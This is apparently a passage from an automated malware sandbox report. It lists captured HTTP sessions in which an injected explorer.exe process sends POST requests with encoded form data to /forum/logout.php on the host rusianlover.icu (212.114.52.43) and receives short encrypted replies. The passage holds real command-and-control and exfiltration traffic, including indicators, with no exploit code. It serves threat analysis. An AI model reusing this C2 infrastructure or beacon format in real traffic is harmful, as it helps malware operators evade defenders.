30 30 33 32 38 30 43 32 38 37 41 46 36 45 45 36 38 42 36 45 42 36 35 45 31 37 42 32 41 45 45 30 35 33 35 38 35 42 42 33 39 31 35 37 34 36 42 32 46 34 37 41 31 38 33 44 39 44 31 41 43 45 44 33 30 42 30 39 36 31 37 39 38 43 46 41 32 37 30 45 39 30 46 35 33 37 42 39 31 35 35 39 36 32 44 43 35 43 45 42 33 46 41 32 32 33 33 33 39 38 37 33 34 39 33 44 38 34 42 46 35 33 33 45 41 46 34 45 33 33 34 37 30 39 38 38 38 38 38 43 43 32 32 45 31 46 41 32 41 46 38 35 39 42 38 31 37 41 44 41 37 41 37 43 34 39 37 33 30 41 42 30 30 42 30 46 31 45 43 38 36 33 31 41 42 43 44 41 38 46 45 36 32 36 46 30 42 42 30 37 36 36 45 44 38 39 45 41 38 34 32 41 46 33 31 42 36 36 37 34 31 43 37 44 44 33 39 42 45 46 31 33 38 45 37 31 32 32 46 41 30 43 39 41 36 44 36 46 45 44 45 32 34 32 39 46 36 33 38 41 36 39 45 38 44 30 31 42 34 44 41 39 41 33 38 41 32 41 35 41 41 33 35 41 38 30 43 43 30 38 42 32 42 34 36 34 38 34 46 37 37 43 34 44
                                        Data Ascii: kuku=fbbdbf0635f91706c04c9390982f3d75c3dddf&iqemaiwe=23804842&myqcug=DB9C736037E75D5ECA9A37BBEE4B99DF0FB8DB1284E0ED24692ABA903F11D1E912936357D0068E186AD7959F501413C0B66BE2E95755C71DBE54A2C3A08326B73483873D46C8A808BA69033C5B0842DD35818F36F3C235CB42D416AC545DF1E44C41B182CD1D3505627C5F5E277B378B98A7F03930D497F38AEC10F863D9494FCB91D7435DD9D7DBF304D571003280C287AF6EE68B6EB65E17B2AEE053585BB3915746B2F47A183D9D1ACED30B0961798CFA270E90F537B9155962DC5CEB3FA223339873493D84BF533EAF4E33470988888CC22E1FA2AF859B817ADA7A7C49730AB00B0F1EC8631ABCDA8FE626F0BB0766ED89EA842AF31B66741C7DD39BEF138E7122FA0C9A6D6FEDE2429F638A69E8D01B4DA9A38A2A5AA35A80CC08B2B46484F77C4D
                                        Mar 10, 2021 11:43:14.175595045 CET10113INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 31 99 37 40 6b fa 10 14 3c 32 d0 83 b1 e7 75 5e 8f a7 5e 8b b4 00 84 2f 5a 22 21 e5 06 25 67 c5 70 fc d2 5a fa a1 2e 23 9d 1c 10 c4 a9 7b 3c 30 85 05 33 63 91 fb 03 53 0c 5c 86 4b 18 84 35 56 ba 1f d0 e5 06 4d f7 9e 82 7e 3e a7 f6 a5 46 b7 8f ad 42 6f bc c1 4a 85 49 46 8b 69 19 ff ae b4 39 0b 3d 8d e8 37 4a 09 90 d5 8c 51 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d17@k<2u^^/Z"!%gpZ.#{<03cS\K5VM~>FBoJIFi9=7JQ0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        18192.168.2.549748212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:16.929115057 CET10135OUTPOST /forum/logout.php?pid=567 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 646
                                        Cache-Control: no-cache
                                        Data Raw: 6c 63 74 6b 62 73 6a 3d 32 32 30 39 31 38 33 35 26 6e 67 7a 73 6c 65 78 71 6a 3d 37 64 30 64 38 35 35 38 38 66 65 66 31 62 66 65 65 61 36 63 64 30 63 34 64 62 36 32 26 70 6b 66 61 76 3d 35 35 31 61 62 31 31 64 63 37 63 33 35 62 61 62 39 35 38 32 33 37 62 61 63 30 39 64 31 66 32 32 66 62 33 33 39 36 61 38 31 34 66 62 38 65 64 64 36 65 66 32 62 34 38 34 61 64 30 61 37 32 37 39 34 33 36 32 31 62 34 38 61 66 36 39 34 32 61 30 35 35 61 37 39 38 63 62 36 36 61 33 63 61 34 38 33 63 63 64 65 30 32 37 31 66 32 36 35 62 38 64 33 38 61 64 30 31 33 32 39 66 39 38 63 39 30 30 36 33 32 30 65 32 30 32 39 32 32 30 66 63 62 38 36 61 38 66 61 33 36 37 39 34 62 33 65 33 39 36 31 65 35 61 33 34 39 65 31 35 63 63 39 33 62 35 31 34 30 34 62 31 32 65 39 37 33 62 38 32 36 32 64 33 66 38 37 65 35 34 34 39 35 35 63 35 38 32 64 32 36 32 33 66 33 31 39 34 39 34 65 39 31 30 63 37 38 30 32 38 38 62 36 64 61 39 34 35 39 37 66 65 39 37 31 33 33 38 65 31 33 63 66 31 35 65 66 31 34 35 34 37 34 62 65 64 35 33 39 33 31 66 35 63 33 30 66 34 38 62 38 34 64 35 62 35 34 61 64 35 38 33 37 32 63 36 32 37 64 65 34 62 61 31 62 36 39 37 30 36 65 31 64 39 38 35 34 31 38 38 33 64 30 38 33 32 34 33 30 33 65 66 35 31 32 31 63 36 38 63 30 33 39 62 36 30 34 34 38 37 37 38 37 31 39 66 32 37 65 37 64 64 34 38 38 31 63 63 32 31 62 32 31 30 30 35 37 62 36 36 36 34 65 36 37 32 33 66 33 65 32 37 66 36 35 31 31 33 36 38 35 65 33 32 31 64 66 30 66 31 62 32 30 63 62 63 61 32 32 36 35 62 35 31 36 32 63 64 61 62 37 33 37 61 39 33 34 64 36 35 39 39 32 36 34 31 37 37 31 62 39 65 61 65 64 65 31 66 61 35 39 37 64 39 32 35 30 32 37 37 31 30 62 33 38 38 37 64 35 31 35 37 38 39 31 62 62 31 31 36 36 39 37 39 66 31 61 65 36 34 62 36 38 35 35 65 35 64 32 63 36 65 36 38 39 62 63 64 34 66 62 39 35 64 37 34 33 65 32 61 64 61 65 66 35 63 34 62 39 62 65 62 34 32 66 34 35 33 65 37 30 35 65 63 35 62 39 31 32 34 62 31 31 62 35 30 38 30 31 61 65 32 64 36 33 65 65 34 62 31 64 39 32 34
                                        Data Ascii: lctkbsj=22091835&ngzslexqj=7d0d85588fef1bfeea6cd0c4db62&pkfav=551ab11dc7c35bab958237bac09d1f22fb3396a814fb8edd6ef2b484ad0a727943621b48af6942a055a798cb66a3ca483ccde0271f265b8d38ad01329f98c9006320e2029220fcb86a8fa36794b3e3961e5a349e15cc93b51404b12e973b8262d3f87e544955c582d2623f319494e910c780288b6da94597fe971338e13cf15ef145474bed53931f5c30f48b84d5b54ad58372c627de4ba1b69706e1d98541883d08324303ef5121c68c039b60448778719f27e7dd4881cc21b210057b6664e6723f3e27f65113685e321df0f1b20cbca2265b5162cdab737a934d65992641771b9eaede1fa597d925027710b3887d5157891bb1166979f1ae64b6855e5d2c6e689bcd4fb95d743e2adaef5c4b9beb42f453e705ec5b9124b11b50801ae2d63ee4b1d924
                                        Mar 10, 2021 11:43:16.998594046 CET10135INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a 9e bb 43 60 0e c7 7a 79 98 7e f0 4c c0 00 4b 58 0a fa 83 99 95 b4 a9 6d 6b f9 ab c8 21 09 59 19 f1 8c 67 d4 3f 0e 3d c6 4c 08 02 19 43 9a 45 cf 23 bd 50 51 c4 57 b2 09 53 fd 8d 57 11 04 6f 57 ff 2a 35 68 26 4d 6e 67 71 f6 91 df 0a c6 82 71 d3 5d f9 13 e8 81 9b eb 2a 82 36 49 71 96 a8 d3 b5 52 ab 57 d4 ad e8 96 02 7b 07 bc 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dC`zy~LKXmk!Yg?=LCE#PQWSWoW*5h&Mngqq]*6IqRW{0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        19192.168.2.549749212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:19.759953976 CET10137OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 672
                                        Cache-Control: no-cache
                                        Data Raw: 7a 65 64 69 68 6d 6c 71 70 3d 32 34 36 32 31 31 39 37 26 62 69 6a 71 72 3d 31 63 36 35 36 38 63 30 62 35 62 65 38 31 35 38 35 61 34 66 61 64 38 65 35 38 39 38 33 63 63 66 36 34 38 32 35 30 62 30 66 33 33 32 34 64 33 61 35 31 62 31 34 38 26 64 6d 70 79 62 6b 6e 3d 31 34 36 32 34 41 34 39 41 41 33 45 44 43 37 46 32 44 41 34 37 39 35 33 37 30 46 35 38 33 39 39 35 43 46 44 38 33 35 31 41 45 30 41 35 31 43 37 33 30 38 43 34 36 46 41 34 37 32 34 41 34 38 30 32 46 42 31 46 32 42 34 46 42 39 46 35 42 31 44 35 34 45 45 45 34 39 41 44 42 43 30 31 36 45 31 30 46 30 45 32 45 37 36 43 45 39 32 45 39 46 46 42 45 38 31 33 39 36 37 43 43 34 34 32 41 39 42 39 46 30 37 32 44 36 38 32 38 39 45 44 45 44 35 39 35 39 32 43 32 38 31 34 37 43 33 39 44 32 41 34 37 30 37 37 30 46 45 30 30 35 44 39 33 34 32 30 35 34 37 35 37 42 38 44 31 35 42 35 34 46 42 37 41 43 45 37 43 43 35 33 38 32 35 46 31 32 38 35 35 41 45 46 34 32 38 35 44 34 39 35 45 44 35 38 45 39 44 39 33 45 38 30 42 36 35 41 32 39 31 35 43 36 34 33 39 33 32 33 46 32 42 45 32 43 32 33 45 44 39 38 32 30 35 34 33 46 39 31 43 44 45 30 34 37 31 44 43 37 37 34 34 39 43 39 44 31 36 44 34 35 36 46 42 32 30 46 39 42 44 37 34 41 44 31 39 35 35 31 37 31 39 46 33 31 45 46 44 31 30 33 32 42 32 38 36 38 31 46 37 46 46 42 33 41 36 34 30 42 30 37 42 33 43 45 30 33 37 31 41 42 43 35 30 38 38 30 46 39 31 41 46 41 32 39 36 32 32 44 31 44 43 36 45 38 41 36 39 38 34 36 39 37 30 45 37 35 37 30 45 39 42 46 32 33 38 33 33 37 32 45 41 45 43 36 32 35 35 44 35 45 31 43 39 35 45 44 45 42 32 31 38 39 45 36 35 33 32 35 32 45 41 31 41 30 33 42 45 31 37 30 32 36 31 45 39 41 37 32 33 34 35 41 31 35 43 31 32 46 42 38 36 44 36 38 31 31 42 35 46 31 43 33 33 37 46 34 42 44 41 41 43 37 39 42 42 41 42 41 46 32 35 41 37 33 43 43 44 32 42 38 44 38 31 42 30 34 43 38 33 44 34 38 34 35 41 41 31 45 45 44 42 30 41 38 36 46 37 41 37 38 39 36 32 30 34 44 33 32 37 32 34 30 46 36 32 41 43 43 35 35 35 34 43 36 35 37 43 32 36 31 41 45 42 43 45 34 42 43 41 45 33 30 41 30 34 36 36 37 34 45 44 44 34
                                        Data Ascii: zedihmlqp=24621197&bijqr=1c6568c0b5be81585a4fad8e58983ccf648250b0f3324d3a51b148&dmpybkn=14624A49AA3EDC7F2DA4795370F583995CFD8351AE0A51C7308C46FA4724A4802FB1F2B4FB9F5B1D54EEE49ADBC016E10F0E2E76CE92E9FFBE813967CC442A9B9F072D68289EDED59592C28147C39D2A470770FE005D9342054757B8D15B54FB7ACE7CC53825F12855AEF4285D495ED58E9D93E80B65A2915C6439323F2BE2C23ED9820543F91CDE0471DC77449C9D16D456FB20F9BD74AD19551719F31EFD1032B28681F7FFB3A640B07B3CE0371ABC50880F91AFA29622D1DC6E8A69846970E7570E9BF2383372EAEC6255D5E1C95EDEB2189E653252EA1A03BE170261E9A72345A15C12FB86D6811B5F1C337F4BDAAC79BBABAF25A73CCD2B8D81B04C83D4845AA1EEDB0A86F7A7896204D327240F62ACC5554C657C261AEBCE4BCAE30A046674EDD4
                                        Mar 10, 2021 11:43:19.829962969 CET10137INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a e4 1a 09 76 8b 0e 93 7a 8a b9 a8 91 e3 81 7b 3a 98 d2 7a 59 d5 67 5b 98 05 ac c6 27 42 aa 50 3f b4 04 69 cb e4 5b 2e 34 d1 85 ab a8 b9 30 53 77 46 c3 95 78 61 20 ab e5 4d 9b fa b1 01 b4 78 af e9 58 6a 76 52 da 88 92 8f 91 f8 82 f0 e8 55 af 8d 75 11 3b 97 db 36 63 67 4b 48 bd 7f 0c c4 92 23 52 bc 34 e9 79 63 c2 1f 3f a4 84 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dvz{:zYg['BP?i[.40SwFxa MxXjvRUu;6cgKH#R4yc?0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        2192.168.2.549718212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:42:33.676134109 CET1218OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 4727
                                        Cache-Control: no-cache
                                        Mar 10, 2021 11:42:33.756139994 CET1223INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:42:40 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a c9 13 08 1f b9 f9 dd 54 61 ae dd a2 49 aa 86 e1 94 bd e0 90 83 0f fa fe bb b6 06 f3 57 07 eb d2 8e 2f 3a e5 53 6c b8 34 5a 2d 8f 03 df 47 5a e1 e6 26 47 74 bc 69 49 1b f9 da bf fd f6 ea 53 54 d7 77 64 30 48 3b 35 50 1b 9f 93 ae 20 24 94 4e 87 bc 93 10 e4 3c 45 c6 9a 3e 4c 5c 10 e5 01 a8 20 a9 c4 16 e4 a5 8d 06 48 ee c1 42 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6dTaIW/:Sl4Z-GZ&GtiISTwd0H;5P $N<E>L\ HB0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        20192.168.2.549750212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:23.035320997 CET10139OUTPOST /forum/logout.php?id=9292886 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 655
                                        Cache-Control: no-cache
                                        Data Raw: 66 6b 76 61 66 3d 31 39 36 61 39 66 31 38 32 35 62 30 32 37 39 61 62 66 33 65 35 31 34 64 35 63 31 31 62 37 33 39 65 66 63 36 66 36 26 64 67 70 73 76 65 68 6b 74 3d 38 33 30 36 30 35 37 26 68 6f 62 69 70 63 6a 3d 35 38 66 31 35 33 33 62 63 38 33 66 62 32 38 33 66 65 64 32 34 63 66 37 36 64 65 38 37 62 63 62 65 39 36 36 39 36 62 35 63 30 61 38 34 32 30 63 37 38 37 63 35 30 30 63 34 64 63 63 61 30 62 39 39 66 61 33 30 39 38 63 34 62 32 34 35 61 36 66 30 33 31 66 66 61 38 35 39 31 64 66 64 61 63 37 37 37 61 37 33 30 35 61 61 65 36 66 38 61 39 34 62 66 62 62 62 35 35 62 63 36 32 66 64 65 65 65 35 36 35 33 66 32 37 66 34 63 35 32 66 66 66 31 66 30 33 65 30 64 63 63 38 66 39 34 33 63 35 36 31 39 36 32 30 31 39 32 39 32 37 64 37 63 37 66 31 33 30 33 34 62 33 34 65 63 33 63 34 30 32 31 33 39 35 62 63 33 37 31 65 63 65 64 63 37 65 31 36 61 66 64 65 31 39 35 63 34 35 63 64 63 38 66 64 61 63 34 64 37 61 35 35 32 36 66 65 33 64 63 31 62 64 38 37 65 36 33 61 39 38 66 66 31 32 63 37 32 65 63 38 32 35 65 62 61 39 35 38 35 31 38 62 33 38 31 33 63 38 39 31 63 32 61 39 37 34 34 30 39 35 34 37 62 31 65 62 32 65 32 35 37 37 37 30 63 64 33 36 39 65 64 37 31 34 62 32 63 62 37 33 61 32 34 31 66 34 64 30 62 36 31 65 64 36 34 65 32 33 31 32 34 30 63 38 64 61 66 36 66 33 34 61 65 30 37 32 33 66 64 39 36 63 61 39 38 31 39 39 64 31 64 62 30 34 30 35 35 35 66 31 66 66 33 63 63 37 65 34 35 61 38 63 39 64 33 33 31 66 34 32 39 64 39 31 39 63 64 65 30 37 62 34 66 32 31 61 35 63 64 31 34 66 37 61 36 38 35 31 39 32 63 37 38 64 37 38 63 37 37 63 35 38 66 66 34 30 61 33 62 34 38 32 36 34 36 37 61 66 34 63 36 33 32 37 38 65 37 63 32 61 39 34 37 30 63 61 30 66 37 30 38 36 34 37 34 39 65 61 38 66 66 35 32 32 33 66 32 36 62 64 62 65 63 32 64 39 65 30 34 33 61 32 30 37 36 62 66 62 61 35 38 65 35 32 63 36 32 32 33 39 61 65 32 32 63 61 61 30 34 39 32 35 64 31 38 36 37 33 35 31 63 37 37 35 30 33 65 34 33 32 34 37 34 33 31 34 64 32 36 30 63 39 32 62 34 65 30 62 63 37 61 39 33
                                        Data Ascii: fkvaf=196a9f1825b0279abf3e514d5c11b739efc6f6&dgpsvehkt=8306057&hobipcj=58f1533bc83fb283fed24cf76de87bcbe96696b5c0a8420c787c500c4dcca0b99fa3098c4b245a6f031ffa8591dfdac777a7305aae6f8a94bfbbb55bc62fdeee5653f27f4c52fff1f03e0dcc8f943c5619620192927d7c7f13034b34ec3c4021395bc371ecedc7e16afde195c45cdc8fdac4d7a5526fe3dc1bd87e63a98ff12c72ec825eba958518b3813c891c2a974409547b1eb2e257770cd369ed714b2cb73a241f4d0b61ed64e231240c8daf6f34ae0723fd96ca98199d1db040555f1ff3cc7e45a8c9d331f429d919cde07b4f21a5cd14f7a685192c78d78c77c58ff40a3b4826467af4c63278e7c2a9470ca0f70864749ea8ff5223f26bdbec2d9e043a2076bfba58e52c62239ae22caa04925d1867351c77503e432474314d260c92b4e0bc7a93
                                        Mar 10, 2021 11:43:23.106848955 CET10139INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a b7 6a 92 54 94 48 8f 05 13 28 90 ce b9 27 a7 b5 34 13 8c a3 7c 7c 48 79 2b ba 9a c8 f5 45 2a 48 3f 23 f0 1d 87 1a 48 37 28 6a 44 02 2a 4f bb fc 79 11 3f 78 fc 57 70 2d 43 7a d6 63 ae 84 1b ee 52 2c 58 f9 72 6c 53 67 af 9f 5a 8d f9 e0 97 44 1a 1b 1a a5 07 6e 17 c8 0b 2c 9d f9 60 07 dd 9c 20 f6 c1 ce 56 6f a7 b1 62 fb a6 f3 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6djTH('4||Hy+E*H?#H7(jD*Oy?xWp-CzcR,XrlSgZDn,` Vob0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        21192.168.2.549751212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:26.019125938 CET10141OUTPOST /forum/logout.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 641
                                        Cache-Control: no-cache
                                        Data Raw: 73 6b 63 75 3d 61 66 39 61 30 30 39 64 31 31 32 38 31 65 65 61 39 30 32 32 39 33 64 36 39 31 26 71 67 77 6d 63 73 69 79 3d 39 38 31 31 38 34 30 36 26 75 6f 69 63 77 71 3d 34 62 65 36 34 38 66 30 36 62 33 64 31 62 36 37 30 30 35 39 38 32 39 66 63 37 32 38 64 66 35 63 65 65 63 33 31 63 31 37 35 64 65 61 63 33 31 32 37 66 39 38 65 39 63 62 30 61 36 30 65 32 36 66 36 63 36 63 31 38 38 34 33 39 35 39 31 32 61 64 38 64 62 32 36 65 62 64 39 31 39 36 30 32 33 64 39 35 62 35 39 64 61 38 62 65 62 38 35 35 62 62 62 30 63 37 30 32 33 32 34 66 37 63 66 65 66 62 66 36 36 65 31 34 65 35 32 62 34 34 37 66 65 36 34 64 62 32 63 64 34 30 36 34 64 34 31 65 39 61 31 61 38 37 39 30 30 66 64 62 62 64 38 33 36 32 61 62 36 62 33 64 39 65 39 65 30 32 36 63 34 30 32 37 37 30 64 61 64 62 65 32 30 35 63 38 61 66 61 65 38 64 36 61 38 31 34 63 66 30 64 37 37 32 34 34 61 36 30 62 34 35 63 32 37 62 62 61 62 65 61 32 62 36 62 33 65 38 61 36 30 64 66 37 33 33 39 65 62 32 66 62 30 37 31 36 32 34 64 65 38 61 33 61 33 34 38 33 64 64 64 34 32 38 30 64 33 33 65 32 31 36 63 33 30 62 39 34 35 61 36 30 32 64 65 65 64 36 65 66 30 62 32 65 36 38 61 31 31 30 38 33 34 30 35 63 64 30 36 30 65 66 62 31 64 64 61 33 30 30 64 38 66 65 36 36 64 62 63 31 35 32 64 34 38 35 63 30 62 30 37 66 64 32 64 34 36 64 63 30 65 33 66 30 36 32 37 39 39 39 39 31 64 33 33 38 30 62 63 32 37 65 32 35 33 65 34 35 31 31 35 31 32 31 64 38 37 32 37 61 31 31 61 30 31 33 66 39 32 66 33 36 65 30 66 35 38 33 65 65 64 64 36 37 33 62 33 61 36 66 32 37 62 36 32 39 31 32 35 34 38 33 35 36 61 32 61 39 30 36 64 38 31 35 66 39 62 33 33 34 62 66 31 65 38 33 31 61 62 37 64 35 30 35 32 62 32 65 35 61 63 36 61 33 37 30 34 39 31 66 64 62 30 38 37 61 35 61 39 38 32 32 30 63 61 63 39 63 64 62 36 63 38 39 65 35 32 32 30 63 32 61 37 33 61 33 30 30 66 34 39 36 31 33 37 39 39 62 33 61 63 62 38 36 34 66 31 35 38 33 65 64 65 65 65 36 32 38 66 61 37 65 64 30 65 66 39 61 32 35 30 32 34 66
                                        Data Ascii: skcu=af9a009d11281eea902293d691&qgwmcsiy=98118406&uoicwq=4be648f06b3d1b670059829fc728df5ceec31c175deac3127f98e9cb0a60e26f6c6c1884395912ad8db26ebd9196023d95b59da8beb855bbb0c702324f7cfefbf66e14e52b447fe64db2cd4064d41e9a1a87900fdbbd8362ab6b3d9e9e026c402770dadbe205c8afae8d6a814cf0d77244a60b45c27bbabea2b6b3e8a60df7339eb2fb071624de8a3a3483ddd4280d33e216c30b945a602deed6ef0b2e68a11083405cd060efb1dda300d8fe66dbc152d485c0b07fd2d46dc0e3f062799991d3380bc27e253e45115121d8727a11a013f92f36e0f583eedd673b3a6f27b62912548356a2a906d815f9b334bf1e831ab7d5052b2e5ac6a370491fdb087a5a98220cac9cdb6c89e5220c2a73a300f49613799b3acb864f1583edeee628fa7ed0ef9a25024f
                                        Mar 10, 2021 11:43:26.088395119 CET10141INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:32 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
                                        Data Raw: 36 64 0d 0a cd 16 a1 1f 31 bf 87 23 f5 d3 d2 27 dc 9f a5 c1 44 77 69 21 fc 32 4f bc b3 cb 1b aa 65 15 e3 a0 aa 36 ec 55 be 6e 6c e1 b0 48 3d 65 49 a4 8a ff ba 55 21 9e 1e 33 23 ba 23 cc fd b9 1c 34 e5 76 4f 5b 59 67 20 03 ab ae de 22 0c c2 39 a4 da b4 96 ee 89 d5 33 86 8e c9 50 18 fb 8f 3b 15 2f 71 a8 b5 f6 3e 1a 17 d4 70 2c 59 dc 9e 00 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6d1#'Dwi!2Oe6UnlH=eIU!3##4vO[Yg "93P;/q>p,Y0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        22192.168.2.549752212.114.52.4380C:\Windows\SysWOW64\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Mar 10, 2021 11:43:28.839087963 CET10143OUTPOST /forum/logout.php?id=8085154 HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                        Host: rusianlover.icu
                                        Content-Length: 671
                                        Cache-Control: no-cache
                                        Data Raw: 65 6f 73 63 67 71 3d 39 32 37 39 39 32 35 34 26 67 73 79 6b 71 63 69 75 3d 32 39 41 35 41 46 39 32 33 45 43 33 36 36 33 44 46 39 46 34 46 31 36 36 33 33 39 30 38 31 39 46 31 39 41 43 46 37 32 39 44 46 31 33 32 42 42 31 30 41 44 30 34 42 32 38 26 69 77 65 73 3d 64 35 34 66 33 32 31 62 36 31 61 35 30 30 64 61 32 34 30 31 65 38 30 34 61 36 38 31 36 61 38 36 37 61 62 39 62 37 63 37 65 37 64 36 62 33 65 34 64 66 30 31 30 37 32 64 38 39 64 31 62 39 37 63 65 31 61 62 61 32 64 36 36 33 30 64 33 38 32 62 35 66 30 38 38 64 34 38 33 66 62 64 34 34 34 61 38 65 34 34 30 65 61 64 63 34 38 33 65 32 62 36 61 31 64 36 31 36 34 65 39 34 39 39 64 61 34 61 33 65 33 63 30 39 38 34 64 32 65 64 62 63 66 62 33 35 62 66 35 38 39 30 61 39 33 65 30 32 38 61 39 33 30 62 61 33 36 39 35 30 32 35 32 33 62 37 65 36 35 62 66 65 32 38 63 33 66 35 63 36 30 63 32 63 64 31 31 30 65 66 34 39 34 61 33 37 64 65 39 31 61 33 36 64 64 31 65 63 36 62 66 61 32 63 32 34 35 65 63 64 65 37 63 30 65 38 61 32 61 35 30 30 33 62 36 32 34 36 37 63 35 66 65 63 30 36 32 62 63 62 31 63 37 38 61 65 38 66 64 32 38 34 66 61 66 39 32 39 32 66 30 31 64 62 31 65 65 38 30 64 62 36 61 38 37 35 38 65 65 61 33 64 34 38 34 38 39 63 36 34 39 35 66 62 37 39 31 30 64 66 61 33 39 39 61 63 32 32 61 39 39 63 39 39 37 62 33 35 36 33 38 34 64 63 31 35 39 30 37 34 31 64 35 62 66 38 38 65 62 31 63 31 62 65 65 35 32 32 65 65 62 35 30 36 34 31 39 63 66 38 37 30 35 31 35 33 62 37 65 31 64 64 63 38 36 36 35 36 66 32 35 34 61 36 31 64 64 64 38 35 65 33 38 38 39 61 35 39 37 66 33 63 31 63 34 62 31 35 64 37 33 37 38 39 39 31 39 65 38 62 62 38 37 65 31 37 36 36 35 35 37 39 65 33 61 36 35 35 37 64 61 65 30 61 37 36 37 34 33 34 39 36 64 33 64 63 31 61 61 34 65 30 36 38 62 36 34 39 63 32 64 65 62 30 61 30 37 66 34 62 63 39 36 36 65 36 35 32 32 65 61 32 38 35 30 32 33 36 38 38 34 30 65 35 31 62 34 34 34 33 66 65 32 65 38 35 63 32 65 31 32 37 34 62 64 39 39 36 64 31 64 34 66 38 30 65 61 33 30 65 30 32 30 64 39 65 62 35 32 38 39 33 31 34 30 30 62 62 35 66 39 36 66 31
                                        Data Ascii: eoscgq=92799254&gsykqciu=29A5AF923EC3663DF9F4F1663390819F19ACF729DF132BB10AD04B28&iwes=d54f321b61a500da2401e804a6816a867ab9b7c7e7d6b3e4df01072d89d1b97ce1aba2d6630d382b5f088d483fbd444a8e440eadc483e2b6a1d6164e9499da4a3e3c0984d2edbcfb35bf5890a93e028a930ba369502523b7e65bfe28c3f5c60c2cd110ef494a37de91a36dd1ec6bfa2c245ecde7c0e8a2a5003b62467c5fec062bcb1c78ae8fd284faf9292f01db1ee80db6a8758eea3d48489c6495fb7910dfa399ac22a99c997b356384dc1590741d5bf88eb1c1bee522eeb506419cf8705153b7e1ddc86656f254a61ddd85e3889a597f3c1c4b15d73789919e8bb87e17665579e3a6557dae0a76743496d3dc1aa4e068b649c2deb0a07f4bc966e6522ea28502368840e51b4443fe2e85c2e1274bd996d1d4f80ea30e020d9eb528931400bb5f96f1
                                        Mar 10, 2021 11:43:28.909027100 CET10143INHTTP/1.1 200 OK
                                        Server: nginx/1.10.3
                                        Date: Wed, 10 Mar 2021 10:43:35 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Vary: Accept-Encoding
